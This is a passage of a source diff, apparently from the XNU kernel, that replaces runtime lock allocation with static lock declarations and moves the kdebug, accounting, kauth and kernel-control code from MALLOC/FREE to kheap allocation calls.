@@ -679,7 +678,7 @@ kdbg_set_tracing_enabled(bool enabled, uint32_t trace_type)
            NULL);
 
        int s = ml_set_interrupts_enabled(false);
-       lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp);
+       lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp);
 
        if (enabled) {
                /*
@@ -696,7 +695,7 @@ kdbg_set_tracing_enabled(bool enabled, uint32_t trace_type)
                kd_ctrl_page.enabled = 0;
                commpage_update_kdebug_state();
        }
-       lck_spin_unlock(kds_spin_lock);
+       lck_spin_unlock(&kds_spin_lock);
        ml_set_interrupts_enabled(s);
 
        if (enabled) {
@@ -712,7 +711,7 @@ static void
 kdbg_set_flags(int slowflag, int enableflag, bool enabled)
 {
        int s = ml_set_interrupts_enabled(false);
-       lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp);
+       lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp);
 
        if (enabled) {
                kd_ctrl_page.kdebug_slowcheck |= slowflag;
@@ -722,7 +721,7 @@ kdbg_set_flags(int slowflag, int enableflag, bool enabled)
                kdebug_enable &= ~enableflag;
        }
 
-       lck_spin_unlock(kds_spin_lock);
+       lck_spin_unlock(&kds_spin_lock);
        ml_set_interrupts_enabled(s);
 }
 
@@ -734,7 +733,7 @@ disable_wrap(uint32_t *old_slowcheck, uint32_t *old_flags)
 {
        bool wrapped;
        int s = ml_set_interrupts_enabled(false);
-       lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp);
+       lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp);
 
        *old_slowcheck = kd_ctrl_page.kdebug_slowcheck;
        *old_flags = kd_ctrl_page.kdebug_flags;
@@ -743,7 +742,7 @@ disable_wrap(uint32_t *old_slowcheck, uint32_t *old_flags)
        kd_ctrl_page.kdebug_flags &= ~KDBG_WRAPPED;
        kd_ctrl_page.kdebug_flags |= KDBG_NOWRAP;
 
-       lck_spin_unlock(kds_spin_lock);
+       lck_spin_unlock(&kds_spin_lock);
        ml_set_interrupts_enabled(s);
 
        return wrapped;
@@ -753,7 +752,7 @@ static void
 enable_wrap(uint32_t old_slowcheck)
 {
        int s = ml_set_interrupts_enabled(false);
-       lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp);
+       lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp);
 
        kd_ctrl_page.kdebug_flags &= ~KDBG_NOWRAP;
 
@@ -761,7 +760,7 @@ enable_wrap(uint32_t old_slowcheck)
                kd_ctrl_page.kdebug_slowcheck &= ~SLOW_NOLOG;
        }
 
-       lck_spin_unlock(kds_spin_lock);
+       lck_spin_unlock(&kds_spin_lock);
        ml_set_interrupts_enabled(s);
 }
 
@@ -935,7 +934,7 @@ release_storage_unit(int cpu, uint32_t kdsp_raw)
        kdsp.raw = kdsp_raw;
 
        s = ml_set_interrupts_enabled(false);
-       lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp);
+       lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp);
 
        kdbp = &kdbip[cpu];
 
@@ -958,7 +957,7 @@ release_storage_unit(int cpu, uint32_t kdsp_raw)
 
                kd_ctrl_page.kds_inuse_count--;
        }
-       lck_spin_unlock(kds_spin_lock);
+       lck_spin_unlock(&kds_spin_lock);
        ml_set_interrupts_enabled(s);
 }
 
@@ -973,7 +972,7 @@ allocate_storage_unit(int cpu)
        int s = 0;
 
        s = ml_set_interrupts_enabled(false);
-       lck_spin_lock_grp(kds_spin_lock, kdebug_lck_grp);
+       lck_spin_lock_grp(&kds_spin_lock, &kdebug_lck_grp);
 
        kdbp = &kdbip[cpu];
 
@@ -1081,7 +1080,7 @@ allocate_storage_unit(int cpu)
        }
        kdbp->kd_list_tail = kdsp;
 out:
-       lck_spin_unlock(kds_spin_lock);
+       lck_spin_unlock(&kds_spin_lock);
        ml_set_interrupts_enabled(s);
 
        return retval;
@@ -2066,27 +2065,6 @@ kdebug_trace_string(__unused struct proc *p,
        return 0;
 }
 
-static void
-kdbg_lock_init(void)
-{
-       static lck_grp_attr_t *kdebug_lck_grp_attr = NULL;
-       static lck_attr_t     *kdebug_lck_attr     = NULL;
-
-       if (kd_ctrl_page.kdebug_flags & KDBG_LOCKINIT) {
-               return;
-       }
-
-       assert(kdebug_lck_grp_attr == NULL);
-       kdebug_lck_grp_attr = lck_grp_attr_alloc_init();
-       kdebug_lck_grp = lck_grp_alloc_init("kdebug", kdebug_lck_grp_attr);
-       kdebug_lck_attr = lck_attr_alloc_init();
-
-       kds_spin_lock = lck_spin_alloc_init(kdebug_lck_grp, kdebug_lck_attr);
-       kdw_spin_lock = lck_spin_alloc_init(kdebug_lck_grp, kdebug_lck_attr);
-
-       kd_ctrl_page.kdebug_flags |= KDBG_LOCKINIT;
-}
-
 int
 kdbg_bootstrap(bool early_trace)
 {
@@ -2425,8 +2403,6 @@ kdebug_reset(void)
 {
        ktrace_assert_lock_held();
 
-       kdbg_lock_init();
-
        kdbg_clear();
        if (kdbg_typefilter) {
                typefilter_reject_all(kdbg_typefilter);
@@ -3354,7 +3330,7 @@ kdbg_wait(uint64_t timeout_ms, bool locked_wait)
        if (!s) {
                panic("kdbg_wait() called with interrupts disabled");
        }
-       lck_spin_lock_grp(kdw_spin_lock, kdebug_lck_grp);
+       lck_spin_lock_grp(&kdw_spin_lock, &kdebug_lck_grp);
 
        if (!locked_wait) {
                /* drop the mutex to allow others to access trace */
@@ -3366,9 +3342,9 @@ kdbg_wait(uint64_t timeout_ms, bool locked_wait)
                kds_waiter = 1;
 
                if (abstime) {
-                       wait_result = lck_spin_sleep_deadline(kdw_spin_lock, 0, &kds_waiter, THREAD_ABORTSAFE, abstime);
+                       wait_result = lck_spin_sleep_deadline(&kdw_spin_lock, 0, &kds_waiter, THREAD_ABORTSAFE, abstime);
                } else {
-                       wait_result = lck_spin_sleep(kdw_spin_lock, 0, &kds_waiter, THREAD_ABORTSAFE);
+                       wait_result = lck_spin_sleep(&kdw_spin_lock, 0, &kds_waiter, THREAD_ABORTSAFE);
                }
 
                kds_waiter = 0;
@@ -3377,7 +3353,7 @@ kdbg_wait(uint64_t timeout_ms, bool locked_wait)
        /* check the count under the spinlock */
        bool threshold_exceeded = (kd_ctrl_page.kds_inuse_count >= n_storage_threshold);
 
-       lck_spin_unlock(kdw_spin_lock);
+       lck_spin_unlock(&kdw_spin_lock);
        ml_set_interrupts_enabled(s);
 
        if (!locked_wait) {
@@ -3408,13 +3384,13 @@ kdbg_wakeup(void)
         */
        bool s = ml_set_interrupts_enabled(false);
 
-       if (lck_spin_try_lock(kdw_spin_lock)) {
+       if (lck_spin_try_lock(&kdw_spin_lock)) {
                if (kds_waiter &&
                    (kd_ctrl_page.kds_inuse_count >= n_storage_threshold)) {
                        kds_waiter = 0;
                        need_kds_wakeup = true;
                }
-               lck_spin_unlock(kdw_spin_lock);
+               lck_spin_unlock(&kdw_spin_lock);
        }
 
        ml_set_interrupts_enabled(s);
@@ -3448,9 +3424,6 @@ kdbg_control(int *name, u_int namelen, user_addr_t where, size_t *sizep)
                value = name[1];
        }
 
-       kdbg_lock_init();
-       assert(kd_ctrl_page.kdebug_flags & KDBG_LOCKINIT);
-
        ktrace_lock();
 
        /*
@@ -4282,8 +4255,6 @@ kdebug_trace_start(unsigned int n_events, const char *filter_desc,
 
        ktrace_start_single_threaded();
 
-       kdbg_lock_init();
-
        ktrace_kernel_configure(KTRACE_KDEBUG);
 
        kdbg_set_nkdbufs(n_events);
index fd3172f7f0f28ab023e1eb794c5d10ec01f1ef1c..3f662a9791a449bd79977731737277ac3f73b778 100644 (file)
  */
 comp_t  encode_comp_t(uint32_t, uint32_t);
 void    acctwatch(void *);
-void    acct_init(void);
 
 /*
  * Accounting vnode pointer, and suspended accounting vnode pointer.  States
@@ -139,18 +138,11 @@ int     acctresume = 4;         /* resume when free space risen to > 4% */
 int     acctchkfreq = 15;       /* frequency (in seconds) to check space */
 
 
-static lck_grp_t       *acct_subsys_lck_grp;
-static lck_mtx_t       *acct_subsys_mutex;
+static LCK_GRP_DECLARE(acct_subsys_lck_grp, "acct");
+static LCK_MTX_DECLARE(acct_subsys_mutex, &acct_subsys_lck_grp);
 
-#define ACCT_SUBSYS_LOCK() lck_mtx_lock(acct_subsys_mutex)
-#define ACCT_SUBSYS_UNLOCK() lck_mtx_unlock(acct_subsys_mutex)
-
-void
-acct_init(void)
-{
-       acct_subsys_lck_grp = lck_grp_alloc_init("acct", NULL);
-       acct_subsys_mutex = lck_mtx_alloc_init(acct_subsys_lck_grp, NULL);
-}
+#define ACCT_SUBSYS_LOCK() lck_mtx_lock(&acct_subsys_mutex)
+#define ACCT_SUBSYS_UNLOCK() lck_mtx_unlock(&acct_subsys_mutex)
 
 
 /*
index 0181ee93de8d2c4a120183cacb21675835dad8e4..a36bc6a51f3bc9c844f48660f5030da51a301116 100644 (file)
  * Authorization scopes.
  */
 
-lck_grp_t *kauth_lck_grp;
-static lck_mtx_t *kauth_scope_mtx;
-#define KAUTH_SCOPELOCK()       lck_mtx_lock(kauth_scope_mtx);
-#define KAUTH_SCOPEUNLOCK()     lck_mtx_unlock(kauth_scope_mtx);
+LCK_GRP_DECLARE(kauth_lck_grp, "kauth");
+static LCK_MTX_DECLARE(kauth_scope_mtx, &kauth_lck_grp);
+#define KAUTH_SCOPELOCK()       lck_mtx_lock(&kauth_scope_mtx);
+#define KAUTH_SCOPEUNLOCK()     lck_mtx_unlock(&kauth_scope_mtx);
 
 /*
  * We support listeners for scopes that have not been registered yet.
@@ -92,7 +92,8 @@ struct kauth_local_listener {
 };
 typedef struct kauth_local_listener *kauth_local_listener_t;
 
-static TAILQ_HEAD(, kauth_listener) kauth_dangling_listeners;
+static TAILQ_HEAD(, kauth_listener) kauth_dangling_listeners =
+    TAILQ_HEAD_INITIALIZER(kauth_dangling_listeners);
 
 /*
  * Scope listeners need to be reworked to be dynamic.
@@ -114,7 +115,7 @@ struct kauth_scope {
 /* values for kauth_scope.ks_flags */
 #define KS_F_HAS_LISTENERS              (1 << 0)
 
-static TAILQ_HEAD(, kauth_scope) kauth_scopes;
+static TAILQ_HEAD(, kauth_scope) kauth_scopes = TAILQ_HEAD_INITIALIZER(kauth_scopes);
 
 static int kauth_add_callback_to_scope(kauth_scope_t sp, kauth_listener_t klp);
 static void     kauth_scope_init(void);
@@ -142,35 +143,14 @@ extern void             release_pathbuff(char *path);
 void
 kauth_init(void)
 {
-       lck_grp_attr_t  *grp_attributes;
-
-       TAILQ_INIT(&kauth_scopes);
-       TAILQ_INIT(&kauth_dangling_listeners);
-
-       /* set up our lock group */
-       grp_attributes = lck_grp_attr_alloc_init();
-       kauth_lck_grp = lck_grp_alloc_init("kauth", grp_attributes);
-       lck_grp_attr_free(grp_attributes);
-
        /* bring up kauth subsystem components */
        kauth_cred_init();
-#if CONFIG_EXT_RESOLVER
-       kauth_identity_init();
-       kauth_groups_init();
-#endif
        kauth_scope_init();
-#if CONFIG_EXT_RESOLVER
-       kauth_resolver_init();
-#endif
-       /* can't alloc locks after this */
-       lck_grp_free(kauth_lck_grp);
-       kauth_lck_grp = NULL;
 }
 
 static void
 kauth_scope_init(void)
 {
-       kauth_scope_mtx = lck_mtx_alloc_init(kauth_lck_grp, 0 /*LCK_ATTR_NULL*/);
        kauth_scope_process = kauth_register_scope(KAUTH_SCOPE_PROCESS, kauth_authorize_process_callback, NULL);
        kauth_scope_generic = kauth_register_scope(KAUTH_SCOPE_GENERIC, kauth_authorize_generic_callback, NULL);
        kauth_scope_fileop = kauth_register_scope(KAUTH_SCOPE_FILEOP, NULL, NULL);
@@ -188,7 +168,7 @@ kauth_alloc_scope(const char *identifier, kauth_scope_callback_t callback, void
        /*
         * Allocate and populate the scope structure.
         */
-       MALLOC(sp, kauth_scope_t, sizeof(*sp), M_KAUTH, M_WAITOK | M_ZERO);
+       sp = kheap_alloc(KM_KAUTH, sizeof(*sp), Z_WAITOK | Z_ZERO);
        if (sp == NULL) {
                return NULL;
        }
@@ -207,7 +187,7 @@ kauth_alloc_listener(const char *identifier, kauth_scope_callback_t callback, vo
        /*
         * Allocate and populate the listener structure.
         */
-       MALLOC(lsp, kauth_listener_t, sizeof(*lsp), M_KAUTH, M_WAITOK);
+       lsp = kheap_alloc(KM_KAUTH, sizeof(*lsp), Z_WAITOK);
        if (lsp == NULL) {
                return NULL;
        }
@@ -236,7 +216,7 @@ kauth_register_scope(const char *identifier, kauth_scope_callback_t callback, vo
                if (strncmp(tsp->ks_identifier, identifier,
                    strlen(tsp->ks_identifier) + 1) == 0) {
                        KAUTH_SCOPEUNLOCK();
-                       FREE(sp, M_KAUTH);
+                       kheap_free(KM_KAUTH, sp, sizeof(struct kauth_scope));
                        return NULL;
                }
        }
@@ -294,7 +274,7 @@ kauth_deregister_scope(kauth_scope_t scope)
                }
        }
        KAUTH_SCOPEUNLOCK();
-       FREE(scope, M_KAUTH);
+       kheap_free(KM_KAUTH, scope, sizeof(struct kauth_scope));
 
        return;
 }
@@ -323,7 +303,7 @@ kauth_listen_scope(const char *identifier, kauth_scope_callback_t callback, void
                        }
                        /* table already full */
                        KAUTH_SCOPEUNLOCK();
-                       FREE(klp, M_KAUTH);
+                       kheap_free(KM_KAUTH, klp, sizeof(struct kauth_listener));
                        return NULL;
                }
        }
@@ -367,7 +347,7 @@ kauth_unlisten_scope(kauth_listener_t listener)
                                        sp->ks_flags &= ~KS_F_HAS_LISTENERS;
                                }
                                KAUTH_SCOPEUNLOCK();
-                               FREE(listener, M_KAUTH);
+                               kheap_free(KM_KAUTH, listener, sizeof(struct kauth_listener));
                                return;
                        }
                }
@@ -378,7 +358,7 @@ kauth_unlisten_scope(kauth_listener_t listener)
                if (klp == listener) {
                        TAILQ_REMOVE(&kauth_dangling_listeners, klp, kl_link);
                        KAUTH_SCOPEUNLOCK();
-                       FREE(listener, M_KAUTH);
+                       kheap_free(KM_KAUTH, listener, sizeof(struct kauth_listener));
                        return;
                }
        }
@@ -1084,7 +1064,7 @@ kauth_filesec_alloc(int count)
                return NULL;
        }
 
-       MALLOC(fsp, kauth_filesec_t, KAUTH_FILESEC_SIZE(count), M_KAUTH, M_WAITOK);
+       fsp = kheap_alloc(KM_KAUTH, KAUTH_FILESEC_SIZE(count), Z_WAITOK);
        if (fsp != NULL) {
                fsp->fsec_magic = KAUTH_FILESEC_MAGIC;
                fsp->fsec_owner = kauth_null_guid;
@@ -1118,7 +1098,7 @@ kauth_filesec_free(kauth_filesec_t fsp)
                panic("freeing KAUTH_FILESEC_WANTED");
        }
 #endif
-       FREE(fsp, M_KAUTH);
+       kheap_free_addr(KM_KAUTH, fsp);
 }
 
 /*
@@ -1206,7 +1186,7 @@ kauth_acl_alloc(int count)
                return NULL;
        }
 
-       MALLOC(aclp, kauth_acl_t, KAUTH_ACL_SIZE(count), M_KAUTH, M_WAITOK);
+       aclp = kheap_alloc(KM_KAUTH, KAUTH_ACL_SIZE(count), Z_WAITOK);
        if (aclp != NULL) {
                aclp->acl_entrycount = 0;
                aclp->acl_flags = 0;
index dec9a91a9359075cff4eb537ee26f0d236738417..1ee265e3d4294cbb4fb4c86fe7dd14c7b9a8c5d3 100644 (file)
@@ -96,7 +96,7 @@ enum ctl_status {
 
 struct ctl_cb {
        TAILQ_ENTRY(ctl_cb)     next;           /* controller chain */
-       lck_mtx_t               *mtx;
+       lck_mtx_t               mtx;
        struct socket           *so;            /* controlling socket */
        struct kctl             *kctl;          /* back pointer to controller */
        void                    *userdata;
@@ -129,13 +129,12 @@ struct ctl_cb {
  */
 
 const u_int32_t         ctl_maxunit = 65536;
-static lck_grp_attr_t   *ctl_lck_grp_attr = 0;
-static lck_attr_t       *ctl_lck_attr = 0;
-static lck_grp_t        *ctl_lck_grp = 0;
-static lck_mtx_t        *ctl_mtx;
+static LCK_ATTR_DECLARE(ctl_lck_attr, 0, 0);
+static LCK_GRP_DECLARE(ctl_lck_grp, "Kernel Control Protocol");
+static LCK_MTX_DECLARE_ATTR(ctl_mtx, &ctl_lck_grp, &ctl_lck_attr);
 
 /* all the controllers are chained */
-TAILQ_HEAD(kctl_list, kctl)     ctl_head;
+TAILQ_HEAD(kctl_list, kctl) ctl_head = TAILQ_HEAD_INITIALIZER(ctl_head);
 
 static int ctl_attach(struct socket *, int, struct proc *);
 static int ctl_detach(struct socket *);
@@ -271,32 +270,6 @@ kern_control_init(struct domain *dp)
        VERIFY(!(dp->dom_flags & DOM_INITIALIZED));
        VERIFY(dp == systemdomain);
 
-       ctl_lck_grp_attr = lck_grp_attr_alloc_init();
-       if (ctl_lck_grp_attr == NULL) {
-               panic("%s: lck_grp_attr_alloc_init failed\n", __func__);
-               /* NOTREACHED */
-       }
-
-       ctl_lck_grp = lck_grp_alloc_init("Kernel Control Protocol",
-           ctl_lck_grp_attr);
-       if (ctl_lck_grp == NULL) {
-               panic("%s: lck_grp_alloc_init failed\n", __func__);
-               /* NOTREACHED */
-       }
-
-       ctl_lck_attr = lck_attr_alloc_init();
-       if (ctl_lck_attr == NULL) {
-               panic("%s: lck_attr_alloc_init failed\n", __func__);
-               /* NOTREACHED */
-       }
-
-       ctl_mtx = lck_mtx_alloc_init(ctl_lck_grp, ctl_lck_attr);
-       if (ctl_mtx == NULL) {
-               panic("%s: lck_mtx_alloc_init failed\n", __func__);
-               /* NOTREACHED */
-       }
-       TAILQ_INIT(&ctl_head);
-
        for (i = 0, pr = &kctlsw[0]; i < kctl_proto_count; i++, pr++) {
                net_add_proto(pr, dp, 1);
        }
@@ -306,10 +279,8 @@ static void
 kcb_delete(struct ctl_cb *kcb)
 {
        if (kcb != 0) {
-               if (kcb->mtx != 0) {
-                       lck_mtx_free(kcb->mtx, ctl_lck_grp);
-               }
-               FREE(kcb, M_TEMP);
+               lck_mtx_destroy(&kcb->mtx, &ctl_lck_grp);
+               kheap_free(KHEAP_DEFAULT, kcb, sizeof(struct ctl_cb));
        }
 }
 
@@ -326,18 +297,13 @@ ctl_attach(struct socket *so, int proto, struct proc *p)
        int error = 0;
        struct ctl_cb                   *kcb = 0;
 
-       MALLOC(kcb, struct ctl_cb *, sizeof(struct ctl_cb), M_TEMP, M_WAITOK);
+       kcb = kheap_alloc(KHEAP_DEFAULT, sizeof(struct ctl_cb), Z_WAITOK | Z_ZERO);
        if (kcb == NULL) {
                error = ENOMEM;
                goto quit;
        }
-       bzero(kcb, sizeof(struct ctl_cb));
 
-       kcb->mtx = lck_mtx_alloc_init(ctl_lck_grp, ctl_lck_attr);
-       if (kcb->mtx == NULL) {
-               error = ENOMEM;
-               goto quit;
-       }
+       lck_mtx_init(&kcb->mtx, &ctl_lck_grp, &ctl_lck_attr);
        kcb->so = so;
        so->so_pcb = (caddr_t)kcb;
 
@@ -359,11 +325,11 @@ ctl_sofreelastref(struct socket *so)
        if (kcb != 0) {
                struct kctl             *kctl;
                if ((kctl = kcb->kctl) != 0) {
-                       lck_mtx_lock(ctl_mtx);
+                       lck_mtx_lock(&ctl_mtx);
                        TAILQ_REMOVE(&kctl->kcb_head, kcb, next);
                        kctlstat.kcs_pcbcount--;
                        kctlstat.kcs_gencnt++;
-                       lck_mtx_unlock(ctl_mtx);
+                       lck_mtx_unlock(&ctl_mtx);
                }
                kcb_delete(kcb);
        }
@@ -474,10 +440,10 @@ ctl_setup_kctl(struct socket *so, struct sockaddr *nam, struct proc *p)
 
        bcopy(nam, &sa, sizeof(struct sockaddr_ctl));
 
-       lck_mtx_lock(ctl_mtx);
+       lck_mtx_lock(&ctl_mtx);
        kctl = ctl_find_by_id_unit(sa.sc_id, sa.sc_unit);
        if (kctl == NULL) {
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                return ENOENT;
        }
 
@@ -485,30 +451,30 @@ ctl_setup_kctl(struct socket *so, struct sockaddr *nam, struct proc *p)
            (so->so_type != SOCK_STREAM)) ||
            (!(kctl->flags & CTL_FLAG_REG_SOCK_STREAM) &&
            (so->so_type != SOCK_DGRAM))) {
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                return EPROTOTYPE;
        }
 
        if (kctl->flags & CTL_FLAG_PRIVILEGED) {
                if (p == 0) {
-                       lck_mtx_unlock(ctl_mtx);
+                       lck_mtx_unlock(&ctl_mtx);
                        return EINVAL;
                }
                if (kauth_cred_issuser(kauth_cred_get()) == 0) {
-                       lck_mtx_unlock(ctl_mtx);
+                       lck_mtx_unlock(&ctl_mtx);
                        return EPERM;
                }
        }
 
        if ((kctl->flags & CTL_FLAG_REG_ID_UNIT) || sa.sc_unit != 0) {
                if (kcb_find(kctl, sa.sc_unit) != NULL) {
-                       lck_mtx_unlock(ctl_mtx);
+                       lck_mtx_unlock(&ctl_mtx);
                        return EBUSY;
                }
        } else if (kctl->setup != NULL) {
                error = (*kctl->setup)(&sa.sc_unit, &kcb->userdata);
                if (error != 0) {
-                       lck_mtx_unlock(ctl_mtx);
+                       lck_mtx_unlock(&ctl_mtx);
                        return error;
                }
        } else {
@@ -527,7 +493,7 @@ ctl_setup_kctl(struct socket *so, struct sockaddr *nam, struct proc *p)
                }
 
                if (unit == ctl_maxunit) {
-                       lck_mtx_unlock(ctl_mtx);
+                       lck_mtx_unlock(&ctl_mtx);
                        return EBUSY;
                }
 
@@ -544,7 +510,7 @@ ctl_setup_kctl(struct socket *so, struct sockaddr *nam, struct proc *p)
        kctlstat.kcs_pcbcount++;
        kctlstat.kcs_gencnt++;
        kctlstat.kcs_connections++;
-       lck_mtx_unlock(ctl_mtx);
+       lck_mtx_unlock(&ctl_mtx);
 
        /*
         * rdar://15526688: Limit the send and receive sizes to sb_max
@@ -580,14 +546,14 @@ done:
 #if DEVELOPMENT || DEBUG
                kcb->status = KCTL_DISCONNECTED;
 #endif /* DEVELOPMENT || DEBUG */
-               lck_mtx_lock(ctl_mtx);
+               lck_mtx_lock(&ctl_mtx);
                TAILQ_REMOVE(&kctl->kcb_head, kcb, next);
                kcb->kctl = NULL;
                kcb->sac.sc_unit = 0;
                kctlstat.kcs_pcbcount--;
                kctlstat.kcs_gencnt++;
                kctlstat.kcs_conn_fail++;
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
        }
        return error;
 }
@@ -692,14 +658,14 @@ end:
 #if DEVELOPMENT || DEBUG
                kcb->status = KCTL_DISCONNECTED;
 #endif /* DEVELOPMENT || DEBUG */
-               lck_mtx_lock(ctl_mtx);
+               lck_mtx_lock(&ctl_mtx);
                TAILQ_REMOVE(&kcb->kctl->kcb_head, kcb, next);
                kcb->kctl = NULL;
                kcb->sac.sc_unit = 0;
                kctlstat.kcs_pcbcount--;
                kctlstat.kcs_gencnt++;
                kctlstat.kcs_conn_fail++;
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
        }
 out:
        ctl_kcb_done_clearing(kcb);
@@ -731,16 +697,16 @@ ctl_disconnect(struct socket *so)
 #endif /* DEVELOPMENT || DEBUG */
 
                socket_unlock(so, 0);
-               lck_mtx_lock(ctl_mtx);
+               lck_mtx_lock(&ctl_mtx);
                kcb->kctl = 0;
                kcb->sac.sc_unit = 0;
                while (kcb->usecount != 0) {
-                       msleep(&kcb->usecount, ctl_mtx, 0, "kcb->usecount", 0);
+                       msleep(&kcb->usecount, &ctl_mtx, 0, "kcb->usecount", 0);
                }
                TAILQ_REMOVE(&kctl->kcb_head, kcb, next);
                kctlstat.kcs_pcbcount--;
                kctlstat.kcs_gencnt++;
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                socket_lock(so, 0);
                ctl_kcb_done_clearing(kcb);
                ctl_kcb_decrement_use_count(kcb);
@@ -1361,6 +1327,7 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt)
        struct kctl     *kctl;
        int     error = 0;
        void    *data = NULL;
+       size_t  data_len = 0;
        size_t  len;
 
        if (sopt->sopt_level != SYSPROTO_CONTROL) {
@@ -1385,9 +1352,10 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt)
                        goto out;
                }
                if (sopt->sopt_valsize != 0) {
-                       MALLOC(data, void *, sopt->sopt_valsize, M_TEMP,
-                           M_WAITOK | M_ZERO);
+                       data_len = sopt->sopt_valsize;
+                       data = kheap_alloc(KHEAP_TEMP, data_len, Z_WAITOK | Z_ZERO);
                        if (data == NULL) {
+                               data_len = 0;
                                error = ENOMEM;
                                goto out;
                        }
@@ -1402,9 +1370,7 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt)
                        socket_lock(so, 0);
                }
 
-               if (data != NULL) {
-                       FREE(data, M_TEMP);
-               }
+               kheap_free(KHEAP_TEMP, data, data_len);
                break;
 
        case SOPT_GET:
@@ -1414,9 +1380,10 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt)
                }
 
                if (sopt->sopt_valsize && sopt->sopt_val) {
-                       MALLOC(data, void *, sopt->sopt_valsize, M_TEMP,
-                           M_WAITOK | M_ZERO);
+                       data_len = sopt->sopt_valsize;
+                       data = kheap_alloc(KHEAP_TEMP, data_len, Z_WAITOK | Z_ZERO);
                        if (data == NULL) {
+                               data_len = 0;
                                error = ENOMEM;
                                goto out;
                        }
@@ -1449,9 +1416,8 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt)
                                }
                        }
                }
-               if (data != NULL) {
-                       FREE(data, M_TEMP);
-               }
+
+               kheap_free(KHEAP_TEMP, data, data_len);
                break;
        }
 
@@ -1473,10 +1439,10 @@ ctl_ioctl(struct socket *so, u_long cmd, caddr_t data,
                struct kctl     *kctl;
                u_int32_t n = 0;
 
-               lck_mtx_lock(ctl_mtx);
+               lck_mtx_lock(&ctl_mtx);
                TAILQ_FOREACH(kctl, &ctl_head, next)
                n++;
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
 
                bcopy(&n, data, sizeof(n));
                error = 0;
@@ -1494,9 +1460,9 @@ ctl_ioctl(struct socket *so, u_long cmd, caddr_t data,
                        error = EINVAL;
                        break;
                }
-               lck_mtx_lock(ctl_mtx);
+               lck_mtx_lock(&ctl_mtx);
                kctl = ctl_find_by_name(ctl_info.ctl_name);
-               lck_mtx_unlock(ctl_mtx);
+               lck_mtx_unlock(&ctl_mtx);
                if (kctl == 0) {
                        error = ENOENT;
                        break;
@@ -1514,19 +1480,19 @@ ctl_ioctl(struct socket *so, u_long cmd, caddr_t data,
 }
 
 static void
-kctl_tbl_grow()
+kctl_tbl_grow(void)
 {
        struct kctl **new_table;
        uintptr_t new_size;
 
-       lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED);
 
        if (kctl_tbl_growing) {
                /* Another thread is allocating */
                kctl_tbl_growing_waiting++;
 
                do {
-                       (void) msleep((caddr_t) &kctl_tbl_growing, ctl_mtx,
+                       (void) msleep((caddr_t) &kctl_tbl_growing, &ctl_mtx,
                            PSOCK | PCATCH, "kctl_tbl_growing", 0);
                } while (kctl_tbl_growing);
                kctl_tbl_growing_waiting--;
@@ -1549,17 +1515,18 @@ kctl_tbl_grow()
 
        new_size = kctl_tbl_size + KCTL_TBL_INC;
 
-       lck_mtx_unlock(ctl_mtx);
-       new_table = _MALLOC(sizeof(struct kctl *) * new_size,
-           M_TEMP, M_WAIT | M_ZERO);
-       lck_mtx_lock(ctl_mtx);
+       lck_mtx_unlock(&ctl_mtx);
+       new_table = kheap_alloc(KHEAP_DEFAULT, sizeof(struct kctl *) * new_size,
+           Z_WAITOK | Z_ZERO);
+       lck_mtx_lock(&ctl_mtx);
 
        if (new_table != NULL) {
                if (kctl_table != NULL) {
                        bcopy(kctl_table, new_table,
                            kctl_tbl_size * sizeof(struct kctl *));
 
-                       _FREE(kctl_table, M_TEMP);
+                       kheap_free(KHEAP_DEFAULT, kctl_table,
+                           sizeof(struct kctl *) * kctl_tbl_size);
                }
                kctl_table = new_table;
                kctl_tbl_size = new_size;
@@ -1581,7 +1548,7 @@ kctl_make_ref(struct kctl *kctl)
 {
        uintptr_t i;
 
-       lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED);
 
        if (kctl_tbl_count >= kctl_tbl_size) {
                kctl_tbl_grow();
@@ -1632,7 +1599,7 @@ kctl_delete_ref(kern_ctl_ref kctlref)
         */
        uintptr_t i = (((uintptr_t)kctlref) & KCTLREF_INDEX_MASK) - 1;
 
-       lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED);
 
        if (i < kctl_tbl_size) {
                struct kctl *kctl = kctl_table[i];
@@ -1657,7 +1624,7 @@ kctl_from_ref(kern_ctl_ref kctlref)
        uintptr_t i = (((uintptr_t)kctlref) & KCTLREF_INDEX_MASK) - 1;
        struct kctl *kctl = NULL;
 
-       lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED);
+       lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED);
 
        if (i >= kctl_tbl_size) {
                kctlstat.kcs_bad_kctlref++;
@@ -1695,17 +1662,16 @@ ctl_register(struct kern_ctl_reg *userkctl, kern_ctl_ref *kctlref)
                return EINVAL;
        }
 
-       MALLOC(kctl, struct kctl *, sizeof(*kctl), M_TEMP, M_WAITOK);
+       kctl = kheap_alloc(KHEAP_DEFAULT, sizeof(struct kctl), Z_WAITOK | Z_ZERO);
        if (kctl == NULL) {
                return ENOMEM;
        }
-       bzero((char *)kctl, sizeof(*kctl));
 
-       lck_mtx_lock(ctl_mtx);
